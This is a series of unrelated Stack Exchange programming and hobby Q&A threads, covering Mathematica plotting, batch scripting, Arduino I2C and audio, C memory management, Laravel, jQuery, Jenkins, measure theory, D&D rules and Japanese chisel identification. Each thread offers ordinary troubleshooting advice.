Plotting 3D graphic for a differential system with Manipulate I try to adapt the following code with three differential equations to a system with four differential equations. My aim is to see a bifurcation in this differential system by looking at three variables of the system. (Mathematically, I proved the possibility of bifurcations for some exogenous parameter set) I have the following code : Manipulate[ With[{sol = First[NDSolve[{{λ'[ t] == (((ρ + θ) - a Subscript[α, 1] k^( Subscript[α, 1] - 1)) λ[t] - μ[ t] γ a Subscript[α, 1] k^( Subscript[α, 1] - 1) - θ (((1 - E^( n (-ζ + θ + ρ))) (k^(-1 - α) \ α ψ + ((-1 + E^(( n (-ζ + θ + ρ))/(-1 + β + \ σ))) (a k^Subscript[α, 1])^(( 1 - σ)/β) (-1 + β + σ) \ (((-1 + E^(( n β (-ζ + θ + ρ))/(-1 + \ β + σ))) (-1 + β + σ))/(-ζ + θ \ + ρ))^(-1 + σ) Subscript[α, 1])/( k β (-ζ + θ + ρ))))/(ζ \ - θ - ρ))), μ'[ t] == ((ρ + θ) μ[t] - μ [t] (1 - 2 s)), k'[t] == ( a k^Subscript[α, 1] - ((λ [ t] β )/((((β + σ - 1) (1 - Exp[-(((ζ - (ρ + θ)) n)/(β + \ σ - 1))]))/(ζ - (ρ + \ θ)))/((((β + σ - 1) (1 - Exp[-(((ζ - (ρ + θ)) β n)/(\ β + σ - 1))]))/(ζ - (ρ + θ)))^( 1 - σ))) )^(β/(1 - β - σ))), s'[t] == (s (1 - s) - γ a k^Subscript[α, 1])}, k[0] == 8424.78495705205 (1 - 10^-15), s[0] == 0.45999999999999996 (1 - 10^-15), μ[ 0] == -4787.8954001202255 (1 - 10^-15), λ[0] == 96.96238348579865 (1 - 10^-15)}, {λ, μ, k, s}, {t, 0, tf}, MaxSteps -> ∞]]}, Column[{ ParametricPlot3D[ Evaluate[{k[t], λ[t], s[t]} /. sol], {t, 0, tf}, BoxRatios -> 1, PlotPoints -> 1000, PlotRange -> All, ImageSize -> {400, 400}, SphericalRegion -> True, Ticks -> False], Plot[Evaluate[{k[t], λ[t], s[t]} /. 
sol], {t, 0, tf}, PlotStyle -> Automatic, ImageSize -> 400, AspectRatio -> 1/6]}]],
{{tf, 130, Style["t", Italic]}, 1, 130, ImageSize -> Tiny},
{{θ, 0.95`}, -.1, 1, ImageSize -> Tiny},
{{β, 0.65`}, 0.18, 3, ImageSize -> Tiny},
{{ρ, 1`}, 0.01, 1, ImageSize -> Tiny},
{{Subscript[α, 1], 1`}, -.1, 1, ImageSize -> Tiny},
{{ψ, 100}, -.1, 100, ImageSize -> Tiny},
{{γ, 0.05}, -.0 .01, 0.05, ImageSize -> Tiny},
{{ζ, 0.05}, -.0 .01, 0.05, ImageSize -> Tiny},
{{σ, 0.05}, -.0 .1, 2, ImageSize -> Tiny},
{{α, 0.05}, -.0 .1, 2, ImageSize -> Tiny},
{{a, 0.05}, -.0 .1, 4, ImageSize -> Tiny},
{{n, 90}, -.0 .1, 90, ImageSize -> Tiny},
ControlPlacement -> Left, SynchronousUpdating -> False]

I know the equations look horrible, sorry for that. When I remove the NDSolve part from Manipulate and assign all parameters the numerical values below (there are 11 constant parameters in total, plus time $t$), everything works, but I don't know why the code does not give any output with Manipulate. What am I missing?

paramFinal = {ρ -> 0.05, θ -> 0.03, n -> 80, Subscript[α, 1] -> 0.3, α -> 0.65, β -> 1.05, a -> 1.65, γ -> 0.01, σ -> 0.5, ψ -> 1, ζ -> 0.014870264736785313};

A hint: extract the NDSolve part from your Manipulate and fix tf to 130. You will see that your parameter and function substitutions contain errors. The final equations you use in NDSolve still contain unsubstituted parameters and you don't get a solution. When you have fixed this and get a solution, you can take care of your Manipulate, but not sooner. How can you vary d as a parameter, whereas d is defined as an expression? @halirutan Thanks for the hint. When I extract the NDSolve from Manipulate as you have mentioned and assign numerical values to the parameters, everything works fine, but with Manipulate there are no error messages yet no output either. @optimalcontrol I don't see how that's possible. You have multiple instances in your code of k and s appearing without their argument, for which NDSolve complains loudly.
Are you sure you are using the exact same code in your notebook?
cd to a search result with dir in cmd I want to know how to change to the directory containing a particular file name, using a batch file. First, I want to search for a particular file using the dir command. I know there will only be one file found. I then want to cd to the directory containing that file. Any suggestions? This should work if you're only searching on the file name (edit: but only if the search uses a wildcard):

for /R %%i in ("myfile.*") do cd "%%~dpi"

(Replace %% with % if running from the command line rather than in a batch file.) If the search doesn't use a wildcard, you could do this:

for /R %%i in (.) do if exist "%%i\myfile.txt" cd "%%i"

If you need to use the dir command because you want to, e.g., select only read-only files, this is another option:

for /F "usebackq tokens=*" %%i in (`dir /s /b /ar "readonly.txt"`) do cd "%%~dpi"

Your 1st code will not work as written because the FOR will iterate a value for each subdirectory, regardless of whether "myfile.txt" exists. You need to add IF EXIST "%%i" to the DO clause. @dbenham: ah, right. When I tested it I was using a wildcard; in that case it works.
Scanning for I2C addresses I'm trying to find the I2C address of an IMU plugged into my Arduino using the code from this URL: http://playground.arduino.cc/Main/I2cScanner. However, the program stalls at this stage: Why could this be happening? Pull-up resistors present? In all likelihood it's a hardware problem. Without more details it is hard to say what that might be. You might mention what device you are using exactly, and exactly what wiring you are using, including pull-up resistors. When the I2C scanner stops, it halts in the function Wire.endTransmission. The cause is a hardware problem on the I2C bus. For example, SDA or SCL is shorted to something, or pull-up resistors are missing (as already mentioned by TisteAndii), or the sensor module is not powered. I assume that the IMU module already has pull-up resistors for SDA and SCL on the module. Which IMU module is it? How did you connect it? Do you have other I2C modules to test the I2C bus?
How does the UA Tunnel Fighter fighting style's reaction attack interact with the Sentinel feat's speed-reduction effect? So let's say I'm a Fighter (F), and a Creature (C) is standing to my side, within my reach (*), like this:

o o o o o
o * * * o
o * F * o
o * C * o
o o o o o

If that creature attempts to move past me (to the left or right) and exit my reach (into the o-zone), will the reaction attack from the Tunnel Fighter fighting style (from Unearthed Arcana: Light, Dark, Underdark!) trigger as he's leaving my reach? I would guess yes, because he has to move a few inches to begin the process of leaving my reach, at which point he's "moved more than 5 feet", which triggers Tunnel Fighter's reaction. If I'm right about that, Tunnel Fighter and the Sentinel feat (PHB, p. 169-170) have an interesting interaction that I'd like clarification on. Assuming I'm in the Tunnel Fighter stance when this happens, I can potentially take an Attack of Opportunity upon the creature as he leaves my reach and use my Reaction to attack him with Tunnel Fighter's trigger. However, Sentinel makes that AO stop the creature in its tracks. Can I take both an Opportunity Attack and the Tunnel Fighter reaction attack in this particular situation? If the creature starts in the bottom-right *, I assume the answer is a cut-and-dried "Yes", since he's clearly "moving more than 5 feet while within my reach" and won't get stopped by Sentinel until he's already moved 10 feet. The uncertainty arises when Sentinel's OA effect prevents him from taking the second 5 feet of movement. And in the same vein, it's clear that the answer is "No" if the creature moves directly down. It has left my reach before it has moved more than 5 feet, so Tunnel Fighter's reaction attack definitely won't trigger. Yes, you can make both a Sentinel opportunity attack and a Tunnel Fighter "within reach" attack. The key point is to read each and see what resources and ordering they use.
The wording for the Tunnel Fighter fighting style says: While in your defensive stance, you can make opportunity attacks without using your reaction, and you can use your reaction to make a melee attack against a creature that moves more than 5 feet while within your reach. And the Sentinel feat (PHB, p. 169-170) reads: When you hit a creature with an opportunity attack, the creature's speed becomes 0 for the rest of the turn. Thus the Tunnel Fighter defensive stance allows opportunity attacks to occur without a reaction, and therefore allows a Sentinel attack to happen without expending your reaction. The uncertain area can also be solved by observing that "more than 5 feet" is anything more than 5 feet, rather than just hopping into then out of reach. Taking your example, traveling from any "*" to an adjacent one is just 5 feet, but anything more is more than 5 feet. In the case of a creature and the player in the positions you outline, the Tunnel Fighter attack would resolve just before the creature leaves your reach, and then the Sentinel attack of opportunity would resolve as the creature leaves your reach, stopping it in its tracks if successful. To further clarify: the Tunnel Fighter attack that can be taken as a reaction to an enemy's movement is not an opportunity attack, and thus the speed reduction on a successful hit from Sentinel does not apply here.
The accessor ways are different for static int and static NSArray Below is this demo code; the logic of the process is not important.

@interface ViewController ()<UITableViewDataSource, UITableViewDelegate>
@end

static int channelIndex = 0;
static NSMutableArray *channelsDataArray = nil;

@implementation ViewController

- (void)getSomething {
    // Append the desiredValuesDict dictionary to the following array.
    if (!self.channelsDataArray) {
        self.channelsDataArray = [[NSMutableArray alloc] initWithObjects: desiredValuesDict, nil];
    } else {
        [self.channelsDataArray addObject:desiredValuesDict];
        NSLog(@"channelsDataArray : %@", self.channelsDataArray);
    }
    // This will print the result I expected.
    NSLog(@"channelIndxBefore: %i", channelIndex);
    ++channelIndex;
    NSLog(@"channelIndxAfter: %i", channelIndex);
}

@end

The question I have is that if I access channelIndex as "self.channelIndex++", a warning comes up: Format specifies type 'int' but the argument has type 'NSInteger *' (aka 'long *') If I access it as "channelIndex++", it works properly. Strangely, I have another static NSMutableArray, channelsDataArray. If I just call [self.channelsDataArray addObject:desiredValuesDict]; it will properly add the object into the array. But if I just use [channelsDataArray addObject:desiredValuesDict]; it will not show any warning, but channelsDataArray will be nil, and it can't assign desiredValuesDict into it. Question: When should I add the self prefix or not? Why are they both static variables, but one has to use self while the other doesn't? I'm guessing you have another @interface (in a .h file). Read that and all should become apparent. If not, look up the difference between instance and global variables. If still stuck after that, edit the question to include the other interface and someone will undoubtedly help you. Of course, if there isn't another interface my guess is wrong... @CRD You are totally right!
I do have channelsDataArray declared in the .h file, and I declared a channelsDataArray between @interface () and @implementation, which is a C-style global variable. Thank you so much; you can post your answer below my question and I will upvote you! [Originally a comment:] The error suggests you have another @interface (in a .h file) and that you've declared an instance variable in that file with the same name as the global variable you have declared in the quoted file. You need to remove one of them; which depends on what you need. HTH
Can I implement word prediction with JComboBox I need advice: is there any way to implement word prediction with JComboBox? When I start typing, I want a dropdown to open with all the words that start with the part I typed. Or do I need to use some other component, and if so, which one? Please help; I read the documentation but I couldn't find what I need. You can take a look at this article: AutoComplete JComboBox, or google for autocompletion and JComboBox. There are several libraries that solve the problem.
Malloc and free in linkedlist recursion function I know that for every malloc there must be a free(), but in the case of an existing linked list passed to a recursive function that inserts new nodes into the list, how would you free that? I'm using valgrind and it shows me that I must free the allocated memory. So my function takes as parameters a char * and the pointer to the list passed as **; I did some research and it needed to be passed like this in order to get the new nodes inserted, even though a plain pointer seemed to work as well.

void showDir(char *name, linkedList **list) {
    DIR *dir;
    struct dirent *entry;
    if (!(dir = opendir(name)))
        return;
    while ((entry = readdir(dir)) != NULL) {
        if (entry->d_type == DT_DIR) {
            char path[1024];
            if (strcmp(entry->d_name, ".") == 0 || strcmp(entry->d_name, "..") == 0)
                continue;
            snprintf(path, sizeof(path), "%s/%s", name, entry->d_name);
            showDir(path, list);
        }
        linkedList *node = malloc(sizeof(linkedList));
        if (!node) {
            printf("Error!");
        }
        node->next = NULL;
        char filePath[1024];
        snprintf(filePath, sizeof(filePath), "%s/%s", name, entry->d_name);
        node->path = malloc(strlen(filePath) + 1);
        strcpy(node->path, filePath);
        if (*list) {
            int found = 0;
            for (linkedList *ptr = *list; ptr != NULL; ptr = ptr->next) {
                if (strcmp(ptr->path, filePath) == 0) {
                    found = 1;
                }
                if (ptr->next == NULL && found == 0) {
                    ptr->next = node;
                    break;
                }
            }
        } else {
            *list = node;
        }
    }
    closedir(dir);
}

I'm calling the recursive function like this:

showDir(ptr->path, &list);

and freeing it like this:

linkedList *ptr = list;
while (ptr != NULL) {
    linkedList *next = ptr->next;
    free(ptr->path);
    free(ptr);
    ptr = next;
}

Of course the list passed in the initial call is already filled up! Thanks for reading, and I hope you can help me understand what I'm doing wrong here!
--EDIT

==1914== 64 (24 direct, 40 indirect) bytes in 1 blocks are definitely lost in loss record 2 of 14
==1914==    at 0x4C2FB0F: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==1914==    by 0x10A633: showDir(filestat.c:512)
==1914==    by 0x10A629: showDir(filestat.c:510)
==1914==    by 0x10A629: showDir(filestat.c:510)
==1914==    by 0x109581: main (filestat.c:186)

Don't know if that's what you're running into (include the Valgrind report), but it appears that you don't free the newly allocated node if it's found. The function showDir right now does not seem to be calling itself recursively. But to answer your question, unless there's some reallocation going on, you can easily free the list after the function call. You can also free when you do reallocation inside the function. @500-InternalServerError Included the valgrind report. @SASSY_ROG What do you mean by "I can easily free the list after the function call"? I need the list for later use and can't free it; if I free the node after allocating it and inserting it into the linked list, it will segfault. What is the state of list prior to the call showDir(ptr->path, &list);? Amend the post and provide a [mcve] Aside: On success, snprintf(filePath, sizeof(filePath), "%s/%s", name, entry->d_name); returns the length of filePath. No need to call strlen(filePath) in the next line. Better to test that return value for success too: int len = snprintf(filePath, sizeof filePath, ...); if (len < 0 || (unsigned) len >= sizeof filePath) Handle_error(); After your for loop, if found == 1 you might wanna free both node->path and node as they did not get added to the list. Also, as soon as the path is found, you can break out of the for loop; you don't have to check the remainder of the list.
Create a tmp pointer. This way, as you free the nodes you can still move through the list. If you don't create a temp pointer to the node you are about to free, you lose access to the rest of the nodes.

void freeList(struct node* head)
{
    struct node* tmp;
    while (head != NULL) {
        tmp = head;
        head = head->next;
        free(tmp);
    }
}

C: How to free nodes in the linked list? The OP does do this. To free a linked list recursively you can do it as follows:

void freeList(struct node* head){
    if(head != NULL){
        freeList(head->next);
        free(head);
    }
}
Lebesgue-measurable function problem I am trying to solve this exercise: Let $\phi: \mathbb R \to \mathbb R$ be a measurable function (Lebesgue-measurable) and $f:\mathbb R^2 \to \mathbb R$ defined as $f(x,y)=xy-\phi(y)$. Show the following: a) $f$ is measurable b) If $E \subset \mathbb R$ is measurable, then $f^{-1}(E)$ is measurable. This is what I could do: a) If I define $h:\mathbb R^2 \to \mathbb R$ as the projection $h(x,y)=y$, then $h$ is continuous and $\phi(y)=\phi \circ h(x,y)$. If I could prove that $\phi \circ h$ is measurable, then, since $g(x,y)=xy$ is continuous and $f=g- \phi \circ h$ is a difference of measurable functions, $f$ is measurable. I couldn't show that $\phi \circ h$ is measurable, so I am not sure if my approach is the appropriate one. b) If $E$ is measurable, then $E$ can be written as $E=H \setminus Z$ with $H$ a $G_{\delta}$ set and $m(Z)=0$. The preimage is $f^{-1}(H \setminus Z)=f^{-1}(H) \setminus f^{-1}(Z)$. Since $H$ is a Borel set, it is easy to see that $f^{-1}(H)$ is measurable. I am having some difficulty trying to show that $f^{-1}(Z)$ is measurable. Since $m(Z)=0$, there exists a $G_{\delta}$ set $G$ with $Z \subset G$ and $m(G)=m(Z)=0$. The set $G$ can be written as $G=\bigcap_{k \in \mathbb N} G_k$ with $(G_k)_{k \in \mathbb N}$ decreasing, $m(G_k)<\infty$. We have $f^{-1}(Z) \subset f^{-1}(G) \subset f^{-1}(G_k)$ for all $k \in \mathbb N$. I didn't know what to do next. Any suggestions would be greatly appreciated. Thanks in advance. The trick is to show that the inverse image of a set of measure zero is measure zero (and hence measurable). Let $Z \subset \mathbb R$ be measure zero. Let $\lambda_n$ denote Lebesgue measure on $\mathbb R^n$.
$$ m = \lambda_2(\{(x,y):xy-\phi(y) \in Z\}) = \int \lambda_1(\{x:xy-\phi(y) \in Z\}) \, d\lambda_1(y) .$$ Unless $y = 0$ (and $\{0\}$ is a set of measure zero, so can be disregarded) $$ \{x:xy-\phi(y) \in Z\} = \frac 1 y (Z + \phi(y)) ,$$ and so $$ \lambda_1(\{x:xy-\phi(y) \in Z\}) = \frac1{|y|} \lambda_1(Z) = 0.$$ Hence $m = 0$. Hint for (a): If $B$ is a Borel subset of ${\Bbb R}$, then $(\phi\circ h)^{-1}(B) = {\Bbb R}\times\phi^{-1}(B)$, and $\phi^{-1}(B)$ is a (Lebesgue) measurable set because $\phi$ is assumed to be Lebesgue measurable. Thanks for the hint!, could you help me with part b)?, basically, what I would like to prove is that if I have a $G_{\delta}$ set $H$ of measure zero, then $f^{-1}(H)$ is measurable, or maybe you have an alternative solution.
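Putting the hint for (a) together with the measure-zero computation above, one possible way to finish part (b) is the following sketch (my wording, not the original answerer's):

```latex
\textbf{Sketch of (b).} Write $E = H \setminus Z$ with $H$ a $G_\delta$ set and
$\lambda_1(Z) = 0$, so that
\[
  f^{-1}(E) = f^{-1}(H) \setminus f^{-1}(Z).
\]
Since $H$ is Borel and $f$ is measurable by part (a), the set $f^{-1}(H)$ is
measurable. For $Z$, choose a $G_\delta$ set $G \supset Z$ with
$\lambda_1(G) = 0$. Applying the computation above with the Borel set $G$ in
place of $Z$,
\[
  \lambda_2\bigl(f^{-1}(G)\bigr)
  = \int \lambda_1\Bigl(\tfrac{1}{y}\bigl(G + \phi(y)\bigr)\Bigr)\, d\lambda_1(y)
  = 0 ,
\]
so $f^{-1}(Z) \subset f^{-1}(G)$ is a subset of a measurable null set. By
completeness of Lebesgue measure, $f^{-1}(Z)$ is measurable (with measure zero),
and hence $f^{-1}(E) = f^{-1}(H) \setminus f^{-1}(Z)$ is measurable.
```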
Run button missing in my jenkins blue ocean pipeline Here is my Jenkinsfile:

pipeline {
    agent any
    options { skipDefaultCheckout() }
    parameters {
        choice(
            name: 'MyParam',
            choices: 'One\nTwo\nThree',
            description: 'slkfjlsdfjlsdjflksdjf')
    }
    stages {
        stage('Checkout') {
            steps {
                echo '========= Checkout stage =========='
                deleteDir()
                checkout scm
            }
        }
        stage('Build') {
            steps {
                echo '========= Build stage =========='
            }
        }
        stage('Deploy') {
            steps {
                echo '========= Deploy stage =========='
            }
        }
    }
}

So I create a new pipeline with it but I don't see a run button: But if I create a regular Jenkins job in the old GUI and then view it in Blue Ocean I DO see the run button: Or maybe I'm misunderstanding how pipelines work. When I create a new pipeline from Blue Ocean it looks like it's creating a "multi branch" pipeline. Perhaps this kind of pipeline doesn't have a parameter choice?? It looks like you clicked on the master branch for that build plan. For me, there is no run button on that screen, but if you click on "Branches" then there is a run button off to the right for each branch (and it lets me select parameters as appropriate after I click the "play button" there). And I don't think this is your issue (since you said there is a run button for other build plans), but for anyone else that comes through here, make sure you're signed in, since your Jenkins instance may have anonymous builds disabled. What happens when I create a new pipeline from Blue Ocean is it indexes and runs a build immediately, I guess defaulting to the first choice. And after creating it I don't see a Run button. Seems broken? My Jenkinsfile is correct; not sure what is happening. Never mind, you're right. The run button is on the branches page. It seems for a job there is a Run button on the main page because, duh, there is only one thing to run. You get a run button for all pipelines that are not multibranch; if it is a multibranch pipeline, which branch, PR, or tag would that button point to?
https://github.com/jenkinsci/blueocean-plugin/blob/88e79617ace615649646f015aa7d09dc9aa99ec1/blueocean-dashboard/src/main/js/components/Activity.jsx#L117 The run button is on the branches page and it's hidden. It shows on mouse-over. Not really the best UX ever...
is there a way to simply convert JSON Array values to a string in javascript I have JSON array data for people's names like this:

'user': [{'name':'tom'}, {'name':'jerry'}]

I want to convert the user array to a string value like this: "tom, jerry". Please let me know how I can convert it. You can try this:

var user = [{'name':'tom'}, {'name':'jerry'}]
console.log(user.map(function(item){return item.name;}).join(", "));

.join(", ") would respect the exact syntax the OP asked for.
Laravel Eloquent many-to-many attach I am new to Laravel, and trying to build a photo album with it. My problem is that I use the attach function to insert the user id and group id into my database. It works okay, but the documentation says this about the attach function: For example, perhaps the role you wish to attach to the user already exists. Just use the attach method: So I wanted to use it the same way: if the album_id already exists, just update it; otherwise insert the new one. But my problem is it always inserts; it does not check if the album_id already exists. My model

class User extends Eloquent {
    public static $timestamps = false;

    public function album()
    {
        return $this->has_many_and_belongs_to('album', 'users_album');
    }
}

Post function

public function post_albums()
{
    $user = User::find($this->id);
    $album_id = Input::get('album');
    $path = 'addons/uploads/albums/'.$this->id.'/'. $album_id . '/';
    $folders = array(
        'path' => $path,
        'small' => $path. 'small/',
        'medium' => $path. 'medium/',
    );
    if (! is_dir($path) ) {
        foreach ($folders as $folder) {
            @mkdir($folder, 0, true);
        }
    }
    $sizes = array(
        array(50 , 50 , 'crop', $folders['small'], 90 ),
        array(164 , 200 , 'crop', $folders['medium'], 90 ),
    );
    $upload = Multup::open('photos', 'image|max:3000|mimes:jpg,gif,png', $path)
        ->sizes( $sizes )
        ->upload();
    if($upload) {
        $user->album()->attach($album_id);
        return Redirect::back();
    } else {
        // error show message remove folder
    }
}

Could someone please point out what I'm doing wrong? Or did I totally misunderstand the attach function? By the way: http://area51.stackexchange.com/proposals/46607/laravel what about the link you posted? Just a link to the Laravel Stack Exchange proposal, for those who are interested in Laravel. Thanks @Collin, I noticed I misunderstood. I made my check yesterday:

$album = $user->album()->where_album_id($album_id)->get();
if(empty($album)) {
    $user->album()->attach($album_id);
}

I believe you have misunderstood the attach function.
The sync function uses attach to add relationships, but only if the relationship doesn't already exist. Following what was done there, I'd suggest pulling a list of IDs, then only inserting if it doesn't already exist in the list.

$current = $user->album()->lists( 'album_id' );
if ( !in_array( $album_id, $current ) ) {
    $user->album()->attach( $album_id );
}

On a side note I'm going to suggest that you follow the default naming convention from Laravel. The relationship method should be $user->albums() because there are many of them. The pivot table should also be named 'album_user'. You will thank yourself later. Contains method of Laravel Collections Laravel collections provide a very useful method, 'contains'. It determines if a key exists in the collection. You can get the collection in your case using $user->album. Note the difference: album is without parentheses. Working code Now all you have to do is use the contains method. The full code will be:

if (!$user->album->contains($album_id)) {
    $user->album()->attach($album_id);
}

It's cleaner and a more 'Laravel' way of getting the required solution. This is handy, but does seem wasteful having to pull the full details of all albums for the user from the database. You only want to know whether a specific album belongs to that user.
jQuery.html() insert input field won't work in IE11 I have a problem regarding jQuery's .html method. I am using the following event to insert an input field in a table row when double-clicking on it. Everything works fine in Google Chrome and Firefox, but it won't work in Internet Explorer 11. The code is the following:

$(document).on('dblclick', '.myTable tbody tr td:not(:first-child)', function () {
    var originContent = this.innerText;
    $(this).html('<input type="text" value="' + originContent + '">');
    $(this).children().focus();
});

I also tried it with the following way to insert the input field:

$(this).html($('<input />', { type: "text", value: originContent }));

But it won't work. There is no error in the IE11 console; it just doesn't replace the innerHTML. But notice: if I try to replace the inner HTML in the debug session with a number or string like .html(1234) or .html('string'), it works. What am I doing wrong? Has anyone else noticed a problem like that? Can you give more details than 'it doesn't work'. What happens? What doesn't happen? Any errors in the console? Have you made any effort to debug this at all - if so, what? Why are you using html() and not append() ? Sorry for the missing information - I also included it in the original post. Well, no error appears in the console. It just does not replace the HTML content of the table row. As I tested, it works if I replace it with just a string or number like .html(1234) or .html('string') @epascarello I'd imagine it's some sort of span or paragraph that, when double-clicked, becomes an editable input. Not that this rules out append() by any means, but that would require the deletion of the previous content as well - html() can of course just do it in one swoop. Perhaps there's a reason to use .append() here that I haven't considered? Indeed @TylerRoper the row includes a text string with the original content which can be edited after being double-clicked.
So empty() and append()? Well, it seems like the concatenation is the problem... manually appending while debugging works, like $(this).empty().append(''); Seems to work just fine in IE: http://jsbin.com/fuseluguvi/1/edit Please provide a Minimal Verifiable Complete Example that actually demonstrates the issue. Otherwise, all the rest of us can do is wildly guess what the problem is. @erfurtjohn Does the value contain any quotation characters or angle brackets perhaps? This is why you shouldn't be using string concatenation to build HTML. @JLRishe it just contains a float number like 3,1234 or 3.213 Are you sure jQuery is loading for you in IE11? I just tried to create an MCVE for this and it didn't work, telling me that $ was not defined. After adding the meta tag described at this answer, your code dropped in the text field as desired. I'll write up the sample code as an answer if that turns out to be your issue. Possible duplicate of My jQuery is not working with IE11 jQuery is working, but not my HTML appending with a value. I tried again, and appending just the bare element without a value is working! But if I try to set the value after appending with .val() it doesn't work again... very weird! I also noticed that jQuery indeed appends it, because I can see the element listed in $(this).children() after appending with the value! But it doesn't appear on screen. I don't know why and how, but apparently the $(this).children().focus(); crashed it or prevented it from showing up in IE... Edit: the error was produced by a wrong event I handled. My first event reacted on double-click on the table row; after appending the HTML input field I changed the focus to the input element. But my second event handler, which should have reacted on focus-out of the input element, missed an input in the selector. So every time I clicked on the table row I inserted the input and removed it at the same time. Why it then works in Chrome is still weird, guess it just knows what I want ¯_(ツ)_/¯
common-pile/stackexchange_filtered
Need help identifying a set of Japanese bench chisels I ran across an auction of a set of Japanese bench chisels, and there wasn't a lot of info provided (and yes I bid because I'm an easy mark), so I'm trying to gather some details from the photos. The only visible markings are stamped on the chisel itself, and I'm wondering if anyone knows anything about it or has suggestions on where to look for further details. Here's a zoomed version of the stamped markings with some photo sharpening: I've sent a note to the auction house for more photos of the storage box or any other identifying info, but I haven't heard back. Thanks for taking a look! Might be better off asking in the Japanese Language stack for an English spelling of the name on the maker's mark. https://japanese.stackexchange.com/ @UnhandledExcepSean Great minds! I already started writing up a post. Thanks! Hi, welcome to SE. I think the Japanese stack might not be as good a place to ask as one might think, given the specialist nature of the subject (you might get a translation but without context, which is effectively useless). "or has suggestions on where to look for further details" I think your best bet is going to be to ask among aficionados of Japanese chisels, and one of the woodworking forums will be a good place to start. Try SawMillCreek first and if there's nobody there who can help directly you might still get a pointer to a better venue. "Here's a zoomed version of the faded markings with some sharpening" Two things I wanted to note re. this sentence. The first is if you re-ask the question elsewhere be sure to say you sharpened the photo. Because of the context I was initially very confused as this portion of the chisel is of course not involved in the sharpening process :-) Second is the markings aren't faded. Virtually no amount of use could actually wear away stamps on steel (even if it is much softer than the steel at the cutting edge). 
These are just faint and/or partial stamps, which is surprisingly common. Thanks @Graphus - good suggestions, refinements made. Thanks to your Japanese Learning stack question, I was able to find the manufacturer. Nagahiro is the English translation according to Google. Your image rotated Partial image from a seller Seems like a match to me; the seller site also seems to refer to is as Osahiro (Nagahiro). From what I can determine, Osahiro is the brand, but Nagahiro is the blacksmith and a well known one at that. Hah - I checked that question a few minutes ago (before coming checking here) -- And came up with the exact same results (even the same seller of new-old-stock chisels in a similar red velvet box). Perfect. Thanks for the follow up and the earned check mark.
How do you convert PCM to PWM? I'm a beginner and I've been developing my own library for a wave player. So far I have the SD card installed and the OLED and rotary encoder all connected. I've successfully read the wave chunk and its data (16-bit and 44.1kHz). My question is that the data in the wave file is PCM and I wish to play it using 16-bit PWM, so how do I convert PCM to PWM? http://playground.arduino.cc/Code/PCMAudio An Arduino is not an audio player. It won't have enough processing power and/or memory for running an SD card, refreshing an OLED display and playing audio. Use specialized hardware and a decent DAC for audio playback. Or go the cheap route and use an LC filter. This video has good info on both DACs (R2R-style) and PWM+Filter "DACs": https://www.youtube.com/watch?v=Y2OPnrgb0pY What's your speaker system? You might need another OpAmp or audio amplifier. tttapa, I've seen a lot of tutorials online. Maybe if I remove the OLED display it might be able to run it, but I'm just curious and I want to get to the end of it even if the output isn't what I desire. Maximilian Gerhardt, an LC filter makes sense after I've generated the PWM signal. My whole problem is that I'm not able to do that. I just don't know what the interface between a PCM WAVE file and PWM is. There is no such thing as a PCM file. PCM is completely erroneously used to describe an uncompressed digital audio file. What it actually means is "A file which contains data that can be fed directly to a PCM device without any form of intermediate conversion". What you have in a "PCM" WAV file is just raw sample data. After your header (usually 44 bytes) you just have 16-bit values representing your sample points, with the two channels interleaved one after the other. Since PCM is a linear audio representation, the sample data it expects is a simple linear representation of the audio (unlike µLaw or A-law) and with no compression (such as MP3 or FLAC).
And that is the exact same data that PWM expects since it too is a simple linear output. However, none of that matters, because the Arduino simply isn't powerful enough to play your file. Maybe a smaller one (8kHz, mono, 8-bit) would be playable, but not yours. The numbers just don't add up. There is a PCMAudio example available, but it only works from audio embedded within your program. There is also a TMRpcm library available which plays from SD card, but is limited to 8-bit mono, though it can supposedly do up to 32kHz sample rate (though I wouldn't want to try doing anything else at all at that rate). You would be better off using a system more geared towards audio - something with an I2S CODEC chip attached would be the best solution. Thanks for replying early. Well I was thinking if we can use 16bit PWM for audio output at 44KHz timer interrupt. And to compensate for the low memory holding capacity of the Arduino we can use double buffering from an SD card. OR Adding an external 16bit DAC IC would reduce the complexity because then maybe I don't have to worry about PWM? (I'm not sure about this part.) See my answer below. PCM can most certainly be converted to PWM and played on most MCUs. You should use an MCU with PWM generators to do that. The problem with PWM is that the max resolution is quite low (10-bit) so you are effectively limited to 8-bit PCM. Use a DSP editor like Audacity to export a 16KHz unsigned 8-bit WAV. Import the WAV file as an array of unsigned char. Set your PWM freq to the resonant freq of your speaker (eg. 31250Hz) Set your PWM timer to fire at 16KHz and set the PWM duty cycle to the next array value. I use 16KHz sample rate because: Reduced memory footprint Fewer timer interrupts PWM's limited resolution does not seem to benefit from anything above 16KHz I use piezo speakers directly wired to PWM pins in H-bridge. A separate amp module might benefit from higher sample rates. 
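The mapping the answers rely on is just a linear rescale of each sample into the timer's duty-cycle range. A sketch of that arithmetic (the 10-bit top value of 1023 is my assumption, matching a typical AVR timer; the function name is illustrative):

```javascript
// Rescale one signed 16-bit PCM sample (-32768..32767) into a PWM
// compare value in 0..top (the duty cycle). For an 8-bit unsigned
// WAV you would skip the offset and scale the byte directly.
function pcmToDuty(sample16, top) {
  const unsigned = sample16 + 32768;        // shift to 0..65535
  return Math.round((unsigned * top) / 65535);
}

// Silence (sample 0) lands mid-scale; full negative swing is duty 0,
// full positive swing is duty == top.
```

On the MCU this runs inside the sample-rate timer interrupt: each tick you load the next sample, compute the duty, and write it to the PWM compare register; the LC filter then averages the pulses back into an analog voltage.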
iPhone custom font with text border/shadow I'm using Zynga's FontLabel to use a custom font in my iPhone project. Is there a way to add a text border and shadow using this? If you mean around the entire label, this FontLabel class appears to just be a subclass of UILabel which has the following properties: @property(nonatomic,retain) UIColor *shadowColor; @property(nonatomic) CGSize shadowOffset; to control shadows. Furthermore, UILabel is a subclass of UIView, each of which is backed by a CALayer, which has the following properties that allow you to apply a border to any CALayer: @property CGFloat borderWidth; @property CGColorRef borderColor; You should be able to set these properties on the object returned by your UILabel's layer property. If you were looking for "outlined text" you need to look for a font that encapsulates that behavior. I don't think the kit can just "figure that one out" for you. HTH.
